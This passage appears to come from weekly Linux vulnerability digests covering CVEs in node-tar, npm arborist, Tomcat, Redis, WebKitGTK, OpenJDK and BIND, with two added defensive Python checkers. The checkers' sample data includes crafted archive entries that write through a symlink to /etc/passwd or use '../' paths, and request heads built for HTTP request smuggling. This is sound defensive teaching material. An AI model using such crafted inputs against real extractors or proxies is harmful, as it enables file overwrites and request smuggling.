This flaw allows an untrusted ‘tar file’ to extract and overwrite files into an arbitrary location. A similar confusion can arise on case-insensitive filesystems.

The highest threat from this vulnerability is to integrity and system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although it requires local access and user interaction (someone has to extract the malicious archive), it can be exploited with a low-complexity attack and without privileges. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point: files are written outside the extraction directory.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-37701
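The fix for this class of bug is to normalize an entry's path before asking "does this land under a symlink I already created?", so that a backslash-separated or differently-cased spelling cannot dodge the cache of known symlinks. The checker below is an added example, not node-tar's code: it walks a list of archive entries in extraction order and reports which ones must be refused, including the backslash trick from CVE-2021-37701 and the case-insensitive variant the advisory mentions. The entry list is constructed for the demonstration.

```python
"""Symlink-aware path checks for archive extraction (CVE-2021-37701 class).

Added example, not node-tar's code. node-tar tracked directories it had
created so a later symlink could not be followed, but compared paths with
'/' only; an entry spelled with backslashes ("a\\b") slipped past that
cache. The checker normalizes separators (and case, for case-insensitive
filesystems) before deciding whether an entry may be written. Entries are
(path, kind, symlink_target) with kind in {"file", "dir", "symlink"}.
"""
import posixpath


def normalize(path, case_insensitive=False):
    """Canonical archive path: forward slashes, no './' or 'x/..' segments."""
    p = posixpath.normpath(path.replace("\\", "/"))
    return p.lower() if case_insensitive else p


def ancestors(p):
    """'a/b/c' -> ['a', 'a/b']: every directory the entry would be placed under."""
    parts = p.split("/")
    return ["/".join(parts[:i]) for i in range(1, len(parts))]


def check_entries(entries, case_insensitive=False):
    """Walk entries in archive order; return [(index, path, reason)] to refuse."""
    symlinks = set()          # normalized paths at which a symlink now exists
    rejected = []
    for idx, (path, kind, _target) in enumerate(entries):
        p = normalize(path, case_insensitive)
        if p.startswith("/") or p == ".." or p.startswith("../"):
            rejected.append((idx, path, "absolute path or parent traversal"))
            continue
        through = next((a for a in ancestors(p) if a in symlinks), None)
        if through is not None:
            rejected.append((idx, path, f"would write through symlink '{through}'"))
            continue
        if kind == "symlink":
            symlinks.add(p)   # anything later placed beneath it is refused
        elif kind == "dir" and p in symlinks:
            rejected.append((idx, path, "directory replaces an earlier symlink"))
    return rejected


# Constructed archive listing that mirrors the public CVE-2021-37701 report.
SAMPLE_ENTRIES = [
    ("a/b", "dir", None),
    ("a\\b", "symlink", "/etc"),          # same place as "a/b" once '\' is normalized
    ("a/b/passwd", "file", None),         # would land in /etc/passwd
    ("docs/readme.txt", "file", None),
    ("bin/run", "symlink", "../docs/readme.txt"),
    ("bin/run/helper", "file", None),     # through a symlink, even a harmless one
    ("/tmp/abs", "file", None),
    ("../escape", "file", None),
    ("Lib/x", "dir", None),
    ("lib/x", "symlink", "/tmp/t"),
    ("Lib/x/evil", "file", None),         # only a problem on case-insensitive disks
]

if __name__ == "__main__":
    for flag in (False, True):
        print(f"case_insensitive={flag}")
        for idx, path, reason in check_entries(SAMPLE_ENTRIES, case_insensitive=flag):
            print(f"  entry {idx} {path!r}: {reason}")
```

Run with `case_insensitive=True` when the extraction target may be APFS, NTFS or any other case-folding filesystem; on such disks entry 10 lands inside the symlink created by entry 9 even though the spellings differ.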

4. Node.js ‘npmcli/arborist’ library vulnerability

Severity: Important    CVSS Score: 7.8

`@npmcli/arborist`, the library that calculates dependency trees and manages the node_modules folder hierarchy for the npm command-line interface, aims to guarantee that package dependency contracts will be met, and the extraction of package contents will always be performed into the expected folder. This is accomplished by extracting package contents into a project’s `node_modules` folder. If the `node_modules` folder of the root project or any of its dependencies is somehow replaced with a symbolic link, it could allow Arborist to write package dependencies to any arbitrary location on the file system.

Syxscore Risk Alert

This vulnerability has a major risk as although it requires local access and user interaction (an npm install of an attacker-influenced dependency tree), it can be exploited with a low-complexity attack and without privileges.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-39135

5. Incorrect parsing of HTTP transfer-encoding request header in Apache Tomcat

Severity: Medium       CVSS Score: 5.3

This is a flaw in Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66. Tomcat did not correctly parse the HTTP Transfer-Encoding request header in some circumstances: it ignored the header if the client declared it would only accept an HTTP/1.0 response, it honoured the identity encoding, and it did not ensure that chunked, if present, was the last encoding. When Tomcat sits behind a reverse proxy that frames the same request differently, this allows HTTP request smuggling.

The highest threat from this vulnerability is to integrity.

Syxscore Risk Alert

This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-33037
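All three Tomcat mistakes are departures from the message-length rules in RFC 7230 section 3.3.3, and a back end that applies those rules strictly cannot be desynchronized from its proxy by them. The function below is an added example, not Tomcat code: it decides how a request body is framed from the raw request head alone, and the constructed request heads exercise each of the three cases plus the ordinary ones.

```python
"""Request framing per RFC 7230 section 3.3.3, with the three checks that
CVE-2021-33037 was missing. Added example, not Tomcat code; the request
heads are constructed. A front-end proxy and a back end must agree on where
a request body ends, or one request can smuggle another past the proxy.
"""

KNOWN_CODINGS = {"chunked", "gzip", "x-gzip", "deflate", "compress", "x-compress"}


def parse_head(raw):
    """Split a raw request head into (request line, [(name, value), ...])."""
    lines = raw.split("\r\n")
    headers = []
    for line in lines[1:]:
        if line == "":
            break                           # blank line ends the head
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def decide_framing(raw):
    """Return ("chunked", None), ("content-length", n) or ("reject", reason).

    The HTTP version in the request line is deliberately never consulted:
    Tomcat skipped Transfer-Encoding for clients announcing HTTP/1.0 (bug 1),
    which let a proxy and Tomcat read different body lengths."""
    _request_line, headers = parse_head(raw)
    te = [v for n, v in headers if n == "transfer-encoding"]
    cl = [v for n, v in headers if n == "content-length"]
    if te and cl:
        return "reject", "both Transfer-Encoding and Content-Length present"
    if te:
        # Several header lines and comma lists combine into one ordered list.
        codings = [c.strip().lower() for v in te for c in v.split(",") if c.strip()]
        if not codings:
            return "reject", "empty Transfer-Encoding"
        if "identity" in codings:
            return "reject", "'identity' is not a transfer-coding (bug 2)"
        unknown = [c for c in codings if c not in KNOWN_CODINGS]
        if unknown:
            return "reject", f"unsupported transfer-coding {unknown[0]!r}"
        if codings[-1] != "chunked":
            return "reject", "chunked must be the final transfer-coding (bug 3)"
        if codings.count("chunked") > 1:
            return "reject", "chunked applied more than once"
        return "chunked", None
    if cl:
        if len(set(cl)) != 1 or not cl[0].isdigit():
            return "reject", "conflicting or malformed Content-Length"
        return "content-length", int(cl[0])
    return "content-length", 0


# Constructed request heads, one per case.
SAMPLE_REQUESTS = {
    "http/1.0 client with chunked": "POST /upload HTTP/1.0\r\nHost: app.example\r\nTransfer-Encoding: chunked\r\n\r\n",
    "identity coding": "POST /upload HTTP/1.1\r\nHost: app.example\r\nTransfer-Encoding: identity\r\n\r\n",
    "chunked not last": "POST /upload HTTP/1.1\r\nHost: app.example\r\nTransfer-Encoding: chunked, gzip\r\n\r\n",
    "te and cl": "POST /upload HTTP/1.1\r\nHost: app.example\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n",
    "plain content-length": "POST /upload HTTP/1.1\r\nHost: app.example\r\nContent-Length: 12\r\n\r\n",
    "gzip then chunked, two header lines": "POST /upload HTTP/1.1\r\nHost: app.example\r\nTransfer-Encoding: gzip\r\nTransfer-Encoding: chunked\r\n\r\n",
}


def demo():
    return {name: decide_framing(raw) for name, raw in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for name, (kind, detail) in demo().items():
        print(f"{name}: {kind} {detail if detail is not None else ''}")
```

The useful habit this encodes is that a back end should never make a framing decision the proxy in front of it would not make; every "reject" above is a request that a strict front end would also refuse or, at worst, forward with an unambiguous length.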


Linux Vulnerabilities of the Week: November 30, 2021

Posted in News

See this week's top Linux issues and keep your IT environment protected from the latest November Linux vulnerabilities.

1. A heap buffer overflow in Redis (>2.6)

Severity: Important    CVSS Score: 8.8

Redis is an open-source, in-memory database that persists on disk. In affected versions, specially crafted Lua scripts executing in Redis can cause the heap-based Lua stack to overflow due to incomplete checks for this condition. This allows a remote attacker to corrupt the heap and potentially trigger remote code execution. Exploitation requires the ability to run Lua scripts (EVAL/EVALSHA); until the update is applied, restricting those commands with Redis ACLs for untrusted users is an effective workaround.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as this can be exposed over any network, with low complexity, low privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-32626

2. Memory corruption in WebKitGTK affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 7.8

This is a flaw in WebKitGTK. Processing maliciously crafted web content may lead to arbitrary code execution.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although it requires local access and user interaction (the victim must load the malicious web content), it can be exploited by an unprivileged attacker with a low-complexity attack.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-30846

3. Incorrect principal selection in OpenJDK

Severity: Medium       CVSS Score: 6.8

This is a vulnerability in the Java SE (8u301, 11.0.12, 17), Oracle GraalVM Enterprise Edition (20.3.3 and 21.2.0) product of Oracle Java SE (component: Libraries).

Exploiting this flaw, a low privileged attacker with network access via Kerberos can compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can lead to unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data.

The highest threat from this vulnerability is to data confidentiality.

Syxscore Risk Alert

This vulnerability has a moderate risk as although it requires user interaction to be exploited, it can be exposed over any network, with a low-complexity attack, and low privileges. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: Required
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-35567

4. Limited sandbox escape via VFS syscalls in WebKitGTK

Severity: Medium       CVSS Score: 5.3

BubblewrapLauncher.cpp in WebKitGTK and WPE WebKit before 2.34.1 allows a limited sandbox bypass that allows a sandboxed process to trick host processes into thinking the sandboxed process is not confined by the sandbox, by abusing VFS syscalls that manipulate its filesystem namespace.

The impact is limited to host services that create UNIX sockets that WebKit mounts inside its sandbox, and the sandboxed process remains otherwise confined.

Syxscore Risk Alert

This vulnerability has a moderate risk as although it requires local access (code already running inside the WebKit sandbox), it can be exploited with a low-complexity attack, low privileges, and without user interaction.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-42762

5. Server response processing flaw in Bind affecting Red Hat Enterprise Linux 8

Severity: Medium       CVSS Score: 5.3

This is a flaw in BIND 9.3.0 -> 9.11.35, 9.12.0 -> 9.16.21, and versions 9.9.3-S1 -> 9.11.35-S1 and 9.16.8-S1 -> 9.16.21-S1 of BIND Supported Preview Edition, as well as release versions 9.17.0 -> 9.17.18 of the BIND 9.17 development branch.

The way the lame cache is currently designed makes it possible for its internal data structures to grow almost infinitely. This caching mechanism could be abused by an attacker to significantly degrade resolver performance.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-25219
